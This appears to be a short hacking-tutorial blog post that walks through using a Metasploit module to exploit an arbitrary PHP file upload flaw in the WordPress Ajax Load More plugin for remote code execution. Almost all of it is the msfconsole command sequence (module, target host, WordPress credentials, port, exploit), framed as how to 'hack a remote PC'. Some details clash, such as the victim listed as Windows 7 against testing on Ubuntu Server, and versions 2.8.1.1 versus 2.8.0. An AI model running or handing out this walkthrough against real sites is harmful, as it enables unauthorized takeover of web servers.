This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows uploading arbitrary php files and getting remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with WordPress 4.1.3 on Ubuntu 12.04/14.04 Server.
Exploit Targets
WordPress Ajax Load More 2.8.0
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_ajax_load_more_file_upload
msf exploit (wp_ajax_load_more_file_upload)>set targeturi wordpress
msf exploit (wp_ajax_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_ajax_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax_load_more_file_upload)>set rport 80
msf exploit (wp_ajax_load_more_file_upload)>exploit
The post Hack Remote PC using WordPress Ajax Load More PHP Upload Vulnerability appeared first on Hacking Articles.